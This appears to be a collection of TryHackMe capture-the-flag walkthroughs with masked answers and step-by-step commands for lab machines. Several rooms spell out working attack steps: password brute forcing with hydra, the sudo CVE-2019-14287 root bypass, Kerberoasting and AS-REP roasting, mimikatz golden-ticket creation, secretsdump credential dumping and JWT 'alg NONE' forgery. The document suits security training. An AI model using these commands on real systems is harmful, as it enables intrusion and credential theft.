FILE: Advent-of-Cyber-2021/Day-08-Santas_Bag_of_Toys/README.md
================================================
# Day 8 - Santa's Bag of Toys
Read the premise above, start the attached Windows analysis machine and find the transcription logs in the SantasLaptopLogs folder on the Desktop.
If you want to RDP into the machine, start the AttackBox and enter the following into a terminal: `xfreerdp /u:Administrator /p:grinch123! /v:MACHINE_IP`
- The credentials for the machine are Administrator as the username, and grinch123! as the password.
No answer needed
Each transcription log is a simple plain text file that you can open in any editor of your choice. While the filenames are random, you can get an idea as to which log "comes first" by looking at the Date Modified or Date Created attributes, or the timestamps just before the file extension!
Open the first transcription log. You can see the commands and output for everything that ran within PowerShell, like whoami and systeminfo!
- What operating system is Santa's laptop running ("OS Name")?
- `********* ******* ** ***`
Review each transcription log to get an idea for what activity was performed on the laptop just after it went missing. In the "second" transcription log, it seems as if the perpetrator created a backdoor user account!
- What was the password set for the new "backdoor" account?
- `********************`
- In one of the transcription logs, the bad actor interacts with the target under the new backdoor user account, and copies a unique file to the Desktop. Before it is copied to the Desktop, what is the full path of the original file?
- `*:*****************************************************.***`
The actor uses a Living Off The Land binary (LOLbin) to encode this file, and then verifies it succeeded by viewing the output file. What is the name of this LOLbin?
- Read the above and open the ShellBagsExplorer.exe application found in the folder on your Desktop.
No answer needed
With ShellBagsExplorer.exe open, use the top-bar menu to select File -> Load offline hive and navigate to the location of where you saved the decoded UsrClass.dat . Load in the UsrClass.dat file and begin to explore the Shellbags discovered!
Under the Desktop folder, there seems to be a suspicious folder named "SantaRat". Could this be a remote access trojan, that was used for further nefarious activity on Santa's laptop? Unfortunately, from just Shellbags alone, we only have insight into folder names (sometimes files, if we are lucky) and column data within Windows Explorer, but not files... how could we uncover more details?
- Drill down into the folders and see if you can find anything that might indicate how we could better track down what this SantaRat really is. What specific folder name clues us in that this might be publicly accessible software hosted on a code-sharing platform?
- `******`
Additionally, there is a unique folder named "Bag of Toys" on the Desktop! This must be where Santa prepares his collection of toys, and this is certainly sensitive data that the actor could have compromised. What is the name of the file found in this folder?
- What is the name of the user that owns the SantaRat repository?
- `**********`
- Explore the other repositories that this user owns. What is the name of the repository that seems especially pertinent to our investigation?
- `*********************`
- Read the information presented in this repository. It seems as if the actor has, in fact, compromised and tampered with Santa's bag of toys! You can review the activity in the transcription logs. It looks as if the actor installed a special utility to collect and eventually exfiltrate the bag of toys. What is the name of the executable that installed a unique utility the actor used to collect the bag of toys?
- `*****************.***`
In the last transcription log, you can see the activity that this actor used to tamper with Santa's bag of toys! It looks as if they collected the original contents with a UHA archive. A UHA archive is similar to a ZIP or RAR archive, but faster and with better compression rates. It is very rare to see, but it looks like Grinch Enterprises are pulling out all the tricks!
You can see the actor compressed the original contents of the bag of toys with a password. Unfortunately, we are unable to see what the specific password was in these transcription logs! Perhaps we could find it elsewhere...
Following this, the actor looks to have removed everything from the bag of toys, and added in new things like coal, mold, worms, and more! What are the contents of these "malicious" files (coal, mold, and all the others)?
We know that the actor seemingly collected the original bag of toys. Maybe there was a slight OPSEC mistake, and we might be able to recover Santa's Bag of Toys! Review the actor's repository for its planned operations... maybe in the commit messages, we could find the original archive and the password!
- What is the password to the original bag_of_toys.uha archive? (You do not need to perform any password-cracking or bruteforce attempts)
- `***************************`
McSkidy was able to download and save a copy of the bag_of_toys.uha archive, and you have it accessible on the Desktop of the Windows analysis machine. After uncovering the password from the actor's GitHub repository, you have everything you need to restore Santa's original bag of toys!!
Double-click on the archive on the desktop to open a graphical UHARC extraction utility that has been prepared for you. Using the password you uncovered, extract the contents into a location of your choosing (you might make a "Bag of Toys" directory on the Desktop to save all the files into).
With that, you have successfully recovered the original contents of Santa's Bag of Toys! You can view these in the Windows Explorer file browser to see how many were present.
- How many original files were present in Santa's Bag of Toys?
- `***`
================================================
FILE: Advent-of-Cyber-2021/Day-09-Where_Is_All_This_Data_Going/README.md
================================================
# Day 9 - Where Is All This Data Going
- In the HTTP #1 - GET requests section, which directory is found on the web server?
- `*****`
- What is the username and password used in the login page in the HTTP #2 - POST section?
- `*******************`
- What is the User-Agent's name that has been sent in HTTP #2 - POST section?
- `***************************************`
- In the DNS section, there is a TXT DNS query. What is the flag in the message of that DNS query?
- `*******************************`
- In the FTP section, what is the FTP login password?
- `**********`
- In the FTP section, what is the FTP command used to upload the secret.txt file?
- `****`
- In the FTP section, what is the content of the secret.txt file?
- `*********`
================================================
FILE: Advent-of-Cyber-2021/Day-10-Offensive_Is_The_Best_Defence/README.md
================================================
# Day 10 - Offensive Is The Best Defence
- Help McSkidy and run nmap -sT MACHINE_IP. How many ports are open between 1 and 100?
- `*`
- What is the smallest port number that is open?
- `**`
- What is the service related to the highest port number you found in the first question?
- `****`
- Now run nmap -sS MACHINE_IP. Did you get the same results? (Y/N)
- `*`
- If you want Nmap to detect the version info of the services installed, you can use nmap -sV MACHINE_IP. What is the version number of the web server?
- `*****************`
- By checking the vulnerabilities related to the installed web server, you learn that there is a critical vulnerability that allows path traversal and remote code execution. Now you can tell McSkidy that Grinch Enterprises used this vulnerability. What is the CVE number of the vulnerability that was solved in version 2.4.51?
- `**************`
- You are putting the pieces together and have a good idea of how your web server was exploited. McSkidy is suspicious that the attacker might have installed a backdoor. She asks you to check if there is some service listening on an uncommon port, i.e. outside the 1000 common ports that Nmap scans by default. She explains that adding -p1-65535 or -p- will scan all 65,535 TCP ports instead of only scanning the 1000 most common ports. What is the port number that appeared in the results now?
- `*****`
- What is the name of the program listening on the newly discovered port?
- `*******`
If you would like to learn more about the topics covered in today’s tasks, we recommend checking out the Network Security module.
No answer needed
================================================
FILE: Advent-of-Cyber-2021/Day-11-Where_Are_The_Reindeers/README.md
================================================
# Day 11 - Where Are The Reindeers?
- There is an open port related to MS SQL Server accessible over the network. What is the port number?
- `nmap -Pn <TARGET_IP>`
- `****`
- If the connection is successful, you will get a prompt. What is the prompt that you have received?
- `sqsh -S <TARGET_IP> -U sa -P t7uLKzddQzVjVFJp`
- `**`
- We can see four columns in the table displayed above: id, first (name), last (name), and nickname. What is the first name of the reindeer of id 9?
- `*******`
- Check the table schedule. What is the destination of the trip scheduled on December 7?
- `select * from reindeer.dbo.schedule;`
- `******`
- Check the table presents. What is the quantity available for the present “Power Bank”?
- `select * from reindeer.dbo.presents;`
- `*****`
- There is a flag hidden in the grinch user's home directory. What are its contents?
- `xp_cmdshell 'dir C:\Users\grinch';`
- `xp_cmdshell 'dir C:\Users\grinch\Documents';`
- `xp_cmdshell 'type C:\Users\grinch\Documents\flag.txt';`
- `***************`
================================================
FILE: Advent-of-Cyber-2021/Day-12-Sharing_Without_Caring/README.md
================================================
# Day 12 - Sharing Without Caring
- Scan the target server with the IP 10.10.112.197. Remember that MS Windows hosts block pings by default, so we need to add -Pn, for example, nmap -Pn 10.10.112.197 for the scan to work correctly. How many TCP ports are open?
- `*`
- In the scan results you received earlier, you should be able to spot NFS or mountd, depending on whether you used the -sV option with Nmap or not. Which port is detected by Nmap as NFS or using the mountd service?
- `****`
- How many shares did you find?
- `*`
- How many shares show “everyone”?
- `*`
- What is the title of file 2680-0.txt?
- `***********`
- It seems that Grinch Enterprises has forgotten their SSH keys on our system. One of the shares contains a private key used for SSH authentication (id_rsa). What is the name of the share?
- `************`
- We can calculate the MD5 sum of a file using md5sum FILENAME. What is the MD5 sum of id_rsa?
- `*******************************`
================================================
FILE: Advent-of-Cyber-2021/Day-13-They_Lost_The_Plan/README.md
================================================
# Day 13 - They Lost The Plan!
- Complete the username: p.....
- `*****`
- What is the OS version?
- `**********************`
- What backup service did you find running on the system?
- `***********`
- What is the path of the executable for the backup service you have identified?
- `**************************************************`
- Run the whoami command on the connection you have received on your attacking machine. What user do you have?
- `**********************`
- What is the content of the flag.txt file?
- `************`
- The Grinch forgot to delete a file where he kept notes about his schedule! Where can we find him at 5:30?
- `**********`
================================================
FILE: Advent-of-Cyber-2021/Day-14-Dev(Insecure)Ops/README.md
================================================
# Day 14 - Dev(Insecure)Ops
- How many pages did the dirb scan find with its default wordlist?
- `*`
- How many scripts do you see in the /home/thegrinch/scripts folder?
- `*`
- What are the five characters following $6$G in pepper's password hash?
- `*****`
- What is the content of the flag.txt file on the Grinch's user’s desktop?
- `***************************`
================================================
FILE: Advent-of-Cyber-2021/Day-15-The_Grinchs_day_off/README.md
================================================
# Day 15 - The Grinch's day off
================================================
FILE: Advent-of-Cyber-2021/Day-16-Ransomware_Madness/README.md
================================================
# Day 16 - Ransomware Madness
- !!! ВАЖНЫЙ !!! (Russian: IMPORTANT)
No answer needed
- What is the operator's username?
- `************`
- What social media platform is the username associated with?
- `*******`
- What is the cryptographic identifier associated with the operator?
- `********************************`
- What platform is the cryptographic identifier associated with?
- `*********`
- What is the bitcoin address of the operator?
- `**********************************`
- What platform does the operator leak the bitcoin address on?
- `******`
- What is the operator's personal email?
- `*****************`
- What is the operator's real name?
- `***********`
================================================
FILE: Advent-of-Cyber-2021/Day-17-Elf_Leaks/README.md
================================================
# Day 17 - Elf Leaks
- What is the name of the S3 Bucket used to host the HR Website announcement?
- `******.*******************.***`
- What is the message left in the flag.txt object from that bucket?
- `**** **** ** *** **** ***** **** **** *** ***** ** ** **** ** *****`
- What other file in that bucket looks interesting to you?
- `*********.***`
- What is the AWS Access Key ID in that file?
- `********************`
- What is the AWS Account ID that access-key works for?
- `************`
- What is the Username for that access-key?
- `***********.***`
- There is an EC2 Instance in this account. Under the TAGs, what is the Name of the instance?
- `*********`
- What is the database password stored in Secrets Manager?
- `***********`
================================================
FILE: Advent-of-Cyber-2021/Day-18-Playing_With_Containers/README.md
================================================
# Day 18 - Playing With Containers
- What command will list container images stored in your local container registry?
- `****** ******`
- What command will allow you to save a docker image as a tar archive?
- `****** ****`
- What is the name of the file (including file extension) for the configuration, repository tags, and layer hash values stored in a container image?
- `********.****`
- What is the token value you found for the bonus challenge?
- `********************************`
================================================
FILE: Advent-of-Cyber-2021/Day-19-Something_Phishy_Is_Going_On/README.md
================================================
# Day 19 - Something Phishy Is Going On
- Who was the email sent to? (Answer is the email address)
- `******************.***`
- Phishing emails use similar domains of their targets to increase the likelihood the recipient will be tricked into interacting with the email. Who does it say the email was from? (Answer is the email address)
- `********************.****`
- Sometimes phishing emails have a different reply-to email address. If this email was replied to, what email address will receive the email response?
- `****************.******`
- Less sophisticated phishing emails will have typos. What is the misspelled word?
- `*******`
- The email contains a link that will redirect the recipient to a fraudulent website in an effort to collect credentials. What is the link to the credential harvesting website?
- `*****://**********.******/***/*******/`
- View the email source code. There is an unusual email header. What is the header and its value?
- `*************: ****`
- You received other reports of phishing attempts from other colleagues. Some of the other emails contained attachments. Open attachment.txt. What is the name of the attachment?
- `***************************.***`
- What is the flag in the PDF file?
- `***{***************************}`
If you want to learn more about phishing, check out the "Phishing" module on TryHackMe.
No answer needed
================================================
FILE: Advent-of-Cyber-2021/Day-20-What_s_the_Worst_That_Could_Happen/README.md
================================================
# Day 20 - What's the Worst That Could Happen?
- Open the terminal and navigate to the file on the desktop named 'testfile'. Using the 'strings' command, check the strings in the file. There is only a single line of output to the 'strings' command. What is the output?
- `**************************}*****************************************`
- Check the file type of 'testfile' using the 'file' command. What is the file type?
- `***** ***** **** *****`
- Calculate the file's hash and search for it on VirusTotal. When was the file first seen in the wild?
- `********** **:**:**`
- On VirusTotal's detection tab, what is the classification assigned to the file by Microsoft?
- `*****:***/***************`
- Go to this link to learn more about this file and what it is used for. What were the first two names of this file?
- `*******.*** ** ************.***`
- The file has 68 characters at the start, known as the known string. It can be appended with whitespace characters up to a limited total number of characters. What is the maximum number of total characters that can be in the file?
- `***`
================================================
FILE: Advent-of-Cyber-2021/Day-21-Needles_In_Computer_Stacks/README.md
================================================
# Day 21 - Needles In Computer Stacks
- We changed the text in the string $a as shown in the eicaryara rule we wrote, from X5O to X50, that is, we replaced the letter O with the number 0. The condition for the Yara rule is $a and $b and $c and $d. If we are to only make a change to the first boolean operator in this condition, what boolean operator shall we replace the 'and' with, in order for the rule to still hit the file?
- `**`
- What option is used in the Yara command in order to list down the metadata of the rules that are a hit to a file?
- `**`
- What section contains information about the author of the Yara rule?
- `********`
- What option is used to print only rules that did not hit?
- `**`
- Change the Yara rule value for the $a string to X50. Rerun the command, but this time with the -c option. What is the result?
- `*`
================================================
FILE: Advent-of-Cyber-2021/Day-22-How_It_Happened/README.md
================================================
# Day 22 - How It Happened
- What is the username (email address of Grinch Enterprises) from the decoded script?
- `******.***********.**********.***`
- What is the mailbox password you found?
- `*******************`
- What is the subject of the email?
- `********* ********`
- What port is the script using to exfiltrate data from the North Pole?
- `***`
- What is the hidden flag found in the document that Grinch Enterprises left behind? (Hint: use the following command oledump.py -s {stream number} -d, the answer will be in the caption).
- `********************`
- There is still a second flag somewhere... can you find it on the machine?
- `*********************`
================================================
FILE: Advent-of-Cyber-2021/Day-23-PowershELlF_Magic/README.md
================================================
# Day 23 - PowershELlF Magic
- What command was executed as Elf McNealy to add a new user to the machine?
- `****************`
- What user executed the PowerShell file to send the password.txt file from the administrator's desktop to a remote server?
- `*****`
- What was the IP address of the remote server? What was the port used for the remote connection? (format: IP,Port)
- `**.**.***.**,****`
- What was the encryption key used to encrypt the contents of the text file sent to the remote server?
- `********************************`
- What application was used to delete the password.txt file?
- `*******.***`
- What is the date and timestamp the logs show that password.txt was deleted? (format: MM/DD/YYYY H:MM:SS PM)
- `**/**/**** *:**:** **`
- What were the contents of the deleted password.txt file?
- `******* *******: ***************************`
================================================
FILE: Advent-of-Cyber-2021/Day-24-Learning_From_The_Grinch/README.md
================================================
# Day 24 - Learning From The Grinch
- What is the username of the other user on the system?
- `*****`
- What is the NTLM hash of this user?
- `********************************`
- What is the password for this user?
- `**********`
================================================
FILE: Advent-of-Cyber-2021/README.md
================================================
# Advent of Cyber 2021 🎄🎅
## [tryhackme.com/edoardottt](https://tryhackme.com/p/edoardottt)

For this year I didn't provide my solution to the challenges since there are already amazing YT videos. Thanks THM :)

================================================
FILE: Agent-Sudo/README.md
================================================
# Agent Sudo
- Deploy the machine
no answer needed
- How many open ports?
- `nmap <TARGET_IP>`
- `3`
- How do you redirect yourself to a secret page?
- `user-agent`
- What is the agent name?
- Let's try changing the user-agent.
- `curl -A "A" -L <TARGET_IP>`. Mmmmh...
- `curl -A "C" -L <TARGET_IP>`. Got it.
- `chris`
- FTP password
- `hydra -l chris -P /usr/share/wordlists/rockyou.txt <TARGET_IP> -vV -t 4 ftp`
- `crystal`
- steg password
- `ftp <TARGET_IP>`
- Enter username `chris` and password `crystal`.
- `mget *`
- From `ToAgentJ.txt` I can understand there is a pic that isn't actually a photo.
- In fact, `binwalk -e cutie.png` extracts useful data.
- `cd _cutie.png.extracted`
- `zip2john 8702.zip > zip.hash`
- `john zip.hash` and we get the password
- `7z e 8702.zip`, enter `Y` and the password.
- `cat ToAgentR.txt`
- Inserting that weird string into CyberChef (from Base64) we get `Area51`.
- `Area51`
- Zip file password
- `alien`
- Who is the other agent (in full name)?
- `steghide info cute-alien.jpg`, enter `y` and the passphrase (`Area51`).
- There is a message.txt inside
- `steghide extract -sf cute-alien.jpg`
- `james`
- SSH password
- `hackerrules!`
- What is the user flag?
- `ssh james@<TARGET_IP>` and then enter the password.
- `cat user_flag.txt`
- `b0**975e8******041**********13c7`
- What is the incident of the photo called?
- Enable ssh on your machine
- `scp Alien_autospy.jpg YOUR-USER-HERE@YOUR-IP-HERE:Alien_autospy.jpg`
- Search that photo with Google Reverse Image.
- `Roswell Alien Autopsy`
- CVE number for the escalation (Format: CVE-xxxx-xxxx)
- `sudo -l`
- `CVE-2019-14287` ([exploit-db](https://www.exploit-db.com/))
- What is the root flag?
- `sudo -u \#$((0xffffffff)) /bin/bash`
- `id`
- `cat /root/root.txt`
- `b53**2f55b57******3341**********`
- (Bonus) Who is Agent R?
- `Deskel`
================================================
FILE: Agent-Sudo/To_agentJ.txt
================================================
Dear agent J,
All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.
From,
Agent C
================================================
FILE: Agent-Sudo/_cutie.png.extracted/To_agentR.txt
================================================
Agent C,
We need to send the picture to 'QXJlYTUx' as soon as possible!
By,
Agent R
================================================
FILE: Agent-Sudo/_cutie.png.extracted/zip.hash
================================================
8702.zip/To_agentR.txt:$zip2$*0*1*0*4673cae714579045*67aa*4e*61c4cf3af94e649f827e5964ce575c5f7a239c48fb992c8ea8cbffe51d03755e0ca861a5a3dcbabfa618784b85075f0ef476c6da8261805bd0a4309db38835ad32613e3dc5d7e87c0f91c0b5e64e*4969f382486cb6767ae6*$/zip2$:To_agentR.txt:8702.zip:8702.zip
================================================
FILE: Agent-Sudo/message.txt
================================================
Hi james,
Glad you find this message. Your login password is hackerrules!
Don't ask me why the password look cheesy, ask agent R who set this password for you.
Your buddy,
chris
================================================
FILE: Anonymous/README.md
================================================
# Anonymous
- Enumerate the machine. How many ports are open?
- `scilla port -target <TARGET_IP>`
- `*`
- What service is running on port 21?
- `ftp`
- What service is running on ports 139 and 445?
- `smb`
- There's a share on the user's computer. What's it called?
- `smbclient -L <TARGET_IP>`
- `****`
- user.txt
- Connect in anonymous mode via ftp and download everything.
- We can write `clean.sh`, so add a reverse shell.
- Fire up a shell and cat the flag.
- `**********************`
- root.txt
- `sudo -l`
- `find / -user root -perm -u=s 2>/dev/null`
- `/usr/bin/env`
- `env /bin/sh -p`
- `cat /root/root.txt`
- `*******************************`
================================================
FILE: Attacking-Kerberos/README.md
================================================
# Attacking Kerberos
- What does TGT stand for?
- `ticket granting ticket`
- What does SPN stand for?
- `service principal name`
- What does PAC stand for?
- `privilege attribute certificate`
- What two services make up the KDC?
- `AS, TGS`
- Deploy the Machine
no answer needed
- How many total users do we enumerate?
- `sudo vim /etc/hosts`, insert the row `<TARGET_IP> CONTROLLER.local`
- Download [User.txt](https://github.com/Cryilllic/Active-Directory-Wordlists/blob/master/User.txt)
- `kerbrute userenum --dc CONTROLLER.local -d CONTROLLER.local User.txt`
- `**`
- What is the SQL service account name?
- `sql*******`
- What is the second "machine" account name?
- `*******2`
- What is the third "user" account name?
- `****3`
- Which domain admin do we get a ticket for when harvesting tickets?
- `ssh Administrator@controller.local`, answer `yes` and enter the password.
- `cd Downloads`
- `Rubeus.exe harvest /interval:30`
- `echo <TARGET_IP> CONTROLLER.local >> C:\Windows\System32\drivers\etc\hosts`
- `Rubeus.exe brute /password:Password1 /noticket`
- `Ad************`
- Which domain controller do we get a ticket for when harvesting tickets?
- `**********-1`
- What is the HTTPService Password?
- `cd Downloads`
- `Rubeus.exe kerberoast`
- Copy the hash onto your attacker machine and put it into a .txt file so we can crack it with hashcat.
- [wordlist](https://raw.githubusercontent.com/Cryilllic/Active-Directory-Wordlists/master/Pass.txt)
- `hashcat -m 13100 -a 0 hash.txt Pass.txt`
- `**********`
- What is the SQLService Password?
- `**************`
- What hash type does AS-REP Roasting use?
- `cd Downloads`
- `Rubeus.exe asreproast`
- Transfer the hash from the target machine over to your attacker machine and put the hash into a txt file.
- Insert `23$` after `$krb5asrep$` so that the first line will be `$krb5asrep$23$User.....`
- `hashcat -m 18200 hash.txt Pass.txt`
- `Kerberos * ****** ***** **`
- Which User is vulnerable to AS-REP Roasting?
- `****3`
- What is the User's Password?
- `*********3`
- Which Admin is vulnerable to AS-REP Roasting?
- `*****2`
- What is the Admin's Password?
- `**********`
- I understand how a pass the ticket attack works
no answer needed
- What is the SQLService NTLM Hash?
- `cd downloads && mimikatz.exe`
- `privilege::debug`
- `lsadump::lsa /inject /name:krbtgt`
- `Kerberos::golden /user:Administrator /domain:controller.local /sid: /krbtgt: /id:`
- `misc::cmd`
- `****************************`
- What is the Administrator NTLM Hash?
- `****************************`
- I understand how to implant a skeleton key into a domain controller with mimikatz
no answer needed
- I Understand the Basics of Attacking Kerberos
no answer needed
================================================
FILE: Attacktive-Directory/README.md
================================================
# Attacktive Directory
- Initiate the VPN connection and deploy the machine!
no answer needed
- Read and follow along with the above.
no answer needed
- What tool will allow us to enumerate port 139/445?
- `enum4linux`
- What is the NetBIOS-Domain Name of the machine?
- `THM-AD`
- What invalid TLD do people commonly use for their Active Directory Domain?
- `.local`
- What command within Kerbrute will allow us to enumerate valid usernames?
- `userenum`
- What notable account is discovered? (These should jump out at you)
- `echo "<TARGET_IP> spookysec.local" | sudo tee -a /etc/hosts` (a plain `sudo echo ... >> /etc/hosts` fails, because the redirection runs as your user, not as root)
- `kerbrute userenum --dc spookysec.local -d spookysec.local User.txt`
- `sv*******`
- What other notable account is discovered? (These should jump out at you)
- `******`
- We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?
- `impacket-GetNPUsers spookysec.local/sv******** -no-pass`
- `sv*******`
- Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)
- `kerberos * ****** ***** 32`
- What mode is the hash?
- `182**`
- Now crack the hash with the modified password list provided, what is the user accounts password?
- `hashcat -m 182** kerberos_hash Pass.txt --force`
- `**************`
- Using what utility can we map remote SMB shares?
- `smbclient`
- Which option will list shares?
- `-l`
- How many remote shares is the server listing?
- `smbclient -L spookysec.local -U 'sv*******'`
- `*`
- There is one particular share that we have access to that contains a text file. Which share is it?
- `msfconsole`
- `search admin/smb/download_file`
- `use 0`
- `show options`
- `set RHOSTS spookysec.local`
- `set RPATH backup_credentials.txt`
- `set SMBDOMAIN spookysec.local`
- `set SMBPASS **************`
- `set SMBSHARE backup`
- `set SMBUSER sv*******`
- `exploit`
- `backup`
- What is the content of the file?
- `***********************************************************`
- Decoding the contents of the file, what is the full contents?
- `echo ***************************************** | base64 -d`
- `********************************`
- What method allowed us to dump NTDS.DIT?
- `DRS****`
- What is the Administrators NTLM hash?
- `impacket-secretsdump -just-dc ba**************************`
- `******************************`
- What method of attack could allow us to authenticate as the user without the password?
- `pass the hash`
- Using a tool called Evil-WinRM what option will allow us to use a hash?
- `-h`
- svc-admin
- `************************+`
- backup
- `************************`
- Administrator
- `*************************`
================================================
FILE: Authenticate/README.md
================================================
# Authenticate
- Deploy the VM
no answer needed
- What is the flag you found after logging as Jack?
- `fad9d***********************`
- Now try the same thing for username Mike
no answer needed
- What is the flag you found after logging as Mike?
- `e1faaa************************`
- What is the flag that you found in darren's account?
- `fe860*************************`
- Now try to do the same trick and see if you can login as arthur.
no answer needed
- What is the flag that you found in arthur's account?
- `d9ac0*************************`
- Use the same method to find the identity of the admin user and retrieve the flag.
- `echo -n '{"typ":"JWT","alg":"NONE"}' | base64` (single quotes keep the JSON's double quotes intact; `-n` drops the trailing newline)
- `echo -n '{"exp":1586620929,"iat":1586620629,"nbf":1586620629,"identity":0}' | base64`
- `92498*******************`
- Find the way to get into superadmin ad
no answer needed
- What is the password for superadmin account?
- `abc******`
- What is the flag you found in superadmin account?
- `7210*****************`
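The two echo | base64 lines above build an alg NONE token whose claims nothing verifies. As an added example (not code from the room or from this repository), here is a naive verifier that trusts the token's own alg header next to a hardened one that pins HS256, requires a signature and enforces exp/nbf; DEMO_KEY and all function names are constructed for the demo.

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Optional

# Constructed demo key for this example only; a real server keeps its key secret.
DEMO_KEY = b"demo-secret-key-not-for-production"


def b64url_encode(data: bytes) -> str:
    """Base64url without padding, the encoding JWT segments use."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    """Inverse of b64url_encode; restores the stripped '=' padding first."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def encode_segment(obj: dict) -> str:
    """JSON-encode a header or payload and base64url it as one token segment."""
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode("utf-8"))


def _hs256(signing_input: str, key: bytes) -> bytes:
    return hmac.new(key, signing_input.encode("ascii"), hashlib.sha256).digest()


def issue_hs256(claims: dict, key: bytes) -> str:
    """What the server should hand out: header.payload.signature, signed with its key."""
    signing_input = encode_segment({"typ": "JWT", "alg": "HS256"}) + "." + encode_segment(claims)
    return signing_input + "." + b64url_encode(_hs256(signing_input, key))


def unsigned_none_token(claims: dict, alg: str = "NONE") -> str:
    """The token the room's echo | base64 lines build: alg NONE and an empty signature."""
    return encode_segment({"typ": "JWT", "alg": alg}) + "." + encode_segment(claims) + "."


def naive_decode(token: str, key: bytes) -> dict:
    """Vulnerable verifier: it lets the token's own header choose the algorithm,
    so a header saying 'none' (in any casing) skips the signature check entirely."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    payload = json.loads(b64url_decode(payload_b64))
    alg = str(header.get("alg", "")).lower()
    if alg == "none":
        return payload  # nothing to verify, whatever claims were written are accepted
    if alg == "hs256":
        expected = _hs256(f"{header_b64}.{payload_b64}", key)
        if hmac.compare_digest(expected, b64url_decode(sig_b64)):
            return payload
    raise ValueError("bad signature")


def strict_decode(token: str, key: bytes, now: Optional[int] = None) -> dict:
    """Hardened verifier: the server pins HS256 (exact match, so 'none', 'NONE' and
    'None' all fail), requires a non-empty signature, and enforces exp/nbf."""
    parts = token.split(".")
    if len(parts) != 3 or not all(parts):
        raise ValueError("malformed token or missing signature")
    header_b64, payload_b64, sig_b64 = parts
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        raise ValueError("algorithm not allowed")
    expected = _hs256(f"{header_b64}.{payload_b64}", key)
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    payload = json.loads(b64url_decode(payload_b64))
    now = int(time.time()) if now is None else now
    if "exp" in payload and now >= payload["exp"]:
        raise ValueError("token expired")
    if "nbf" in payload and now < payload["nbf"]:
        raise ValueError("token not yet valid")
    return payload


def strict_accepts(token: str, key: bytes, now: Optional[int] = None) -> bool:
    """True if strict_decode accepts the token, False if it rejects it for any reason."""
    try:
        strict_decode(token, key, now)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Claims shaped like the room's payload; identity 0 is the admin account it asks about.
    claims = {"exp": 1586620929, "iat": 1586620629, "nbf": 1586620629, "identity": 0}
    forged = unsigned_none_token(claims)
    print("naive verifier on alg NONE token :", naive_decode(forged, DEMO_KEY))
    print("strict verifier on alg NONE token:", strict_accepts(forged, DEMO_KEY, now=1586620700))
    signed = issue_hs256(claims, DEMO_KEY)
    print("strict verifier on signed token  :", strict_accepts(signed, DEMO_KEY, now=1586620700))
```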
================================================
FILE: Avengers-Blog/README.md
================================================
# Avengers Blog
- Connect to our network by going to your access page. This is important as you will not be able to access the machine without connecting!
no answer needed
- Deploy the machine by clicking the green "Deploy" button on this task and access its webserver.
no answer needed
- On the deployed Avengers machine you recently deployed, get the flag1 cookie value.
- `*****************`
- Look at the HTTP response headers and obtain flag 2.
- `headers***************`
- Look around the FTP share and read flag 3!
- `nmap -v <TARGET_IP>`
- `ftp <TARGET_IP>`, enter user and password.
- `ls`
- `cd files`
- `get flag3.txt`
- `exit`
- `cat flag3.txt`
- `*************************************`
- What is the directory that has an Avengers login?
- `scilla dir -target <TARGET_IP>`
- `/p*****`
- Log into the Avengers site. View the page source, how many lines of code are there?
- `***`
- Read the contents of flag5.txt
- `rev ../flag5.txt`
- `echo "FLAG" | rev`
- `********************************`
================================================
FILE: Baron-Samedit/README.md
================================================
# Baron Samedit
- Deployed!
no answer needed
- After compiling the exploit, what is the name of the executable created (blurred in the screenshots above)?
- `ssh tryhackme@<TARGET_IP>` and enter the password `tryhackme`
- `cd Exploit`
- `make`
- `sudo-h****************`
- Run the exploit! You should now have a root shell -- what is the flag in /root/flag.txt?
- `cat /etc/os-release`
- `./sudo-h**************** 0`
- `cd /root`
- `cat flag.txt`
- `THM{********************************}`
================================================
FILE: Bash-Scripting/README.md
================================================
# Bash Scripting
- Are you ready to go!
no answer needed
- What piece of code can we insert at the start of a line to comment out our code?
- `#`
- What will the following script output to the screen, echo “BishBashBosh”
- `BishBashBosh`
- What would this code return?
- `Jammy is 21 years old`
- How would you print out the city to the screen?
- `echo $city`
- How would you print out the country to the screen?
- `echo $country`
- How can we get the number of arguments supplied to a script?
- `$#`
- How can we get the filename of our current script(aka our first argument)?
- `$0`
- How can we get the 4th argument supplied to the script?
- `$4`
- If a script asks us for input how can we direct our input into a variable called ‘test’ using “read”
- `read test`
- What will the output of “echo $1 $3” be if the script was run with “./script.sh hello hola aloha”?
- `hello aloha`
- What would be the command to print audi to the screen using indexing.
- `echo "${cars[1]}"`
- If we wanted to remove tesla from the array how would we do so?
- `unset cars[3]`
- How could we insert a new value called toyota to replace tesla?
- `cars[3]="toyota"`
- What is the flag to check if we have read access to a file?
- `-r`
- What is the flag to check to see if it's a directory?
- `-d`
- Well done!
no answer needed
================================================
FILE: Bebop/README.md
================================================
# Bebop
- Deploy the machine
no answer needed
- What is your codename?
- `pilot`
- What is the User Flag?
- `scilla port -target <TARGET_IP>`
- `nmap -p 22,23 -A <TARGET_IP>`
- `telnet <TARGET_IP> 23` as `pilot`
- `ls`
- `cat user.txt`
- `**********************`
- What is the Root Flag?
- `sudo -l`
- `(root) NOPASSWD: /usr/local/bin/busybox`
- Visit GTFObins, busybox.
- `sudo busybox sh`
- `id`
- `cat /root/root.txt`
- `**************************`
- What is the low privileged user?
- `pilot`
- What binary was used to escalate privileges?
- `busybox`
- What service was used to gain an initial shell?
- `telnet`
- What Operating System does the drone run?
- `FreeBSD`
- Watch the video.
no answer needed
================================================
FILE: Bolt/README.md
================================================
# Bolt
- Start the machine
no answer needed
- What port number has a web server with a CMS running?
- `nmap -sV <TARGET_IP>`
- `8000`
- What is the username we can find in the CMS?
- `bolt`
- What is the password we can find for the username?
- `*****d*in123`
- What version of the CMS is installed on the server? (Ex: Name 1.1.1)
- Log into the page `<TARGET_IP>/bolt` with the username and password previously found.
- `Bolt 3.7.1`
